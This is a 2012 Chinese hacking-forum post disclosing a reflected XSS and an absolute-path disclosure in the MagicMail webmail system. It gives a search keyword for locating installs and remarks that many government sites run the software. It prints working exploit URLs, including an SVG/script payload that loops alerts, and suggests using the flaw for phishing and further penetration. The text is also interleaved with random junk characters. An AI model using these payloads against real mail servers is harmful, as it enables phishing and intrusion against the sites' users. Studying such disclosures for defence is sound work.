找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1947|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞9 K! [: i+ D0 M# r4 m% d
3 j0 Q0 w' r2 _9 }
" [3 o, @! q/ L$ y* V# B& N- k( Y
包含  一个反射性XSS  以及  绝对路径泄漏
2 v' J4 R& G) p3 v看了看 貌似全部是linux的。
0 @! A0 M& h6 h' ^, V 6 B7 B8 ^9 r6 o/ n7 I1 Y7 `/ Q
关键字:迈捷邮件系统 by MagicMail
! {$ A7 W- t0 t  }9 Q: K  w* [
5 Y# I0 Q( r# @$ t; `/ t可以看到很多政府网站都用这个邮件系统
: ^5 d& S2 T) K" f/ s1 X/ i. y1 Z5 P. [1 g3 g# g/ m* A) s
绝对路径 http://madman.in/index.php?login_type=declare&language=( k) M. t" E7 \" Z5 M
5 @9 {* d  P9 g7 o. u

% k4 A$ ]% T7 n5 t- V, C  U/ C# M5 w  q7 t. X5 M4 J
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
+ T% J  N+ h0 g7 y% a/ m/ {# b$ q/ q4 B* J6 C

/ u+ ?* t& d; v/ p* Z0 @' j  f* o
/ n* X( i0 @2 ~1 @' G虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
; z2 ]# V5 j1 y* v
) k. v8 w8 ]5 r5 j+ d修复方案:看官方补丁吧。
, _* K1 f7 }- j0 b& N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表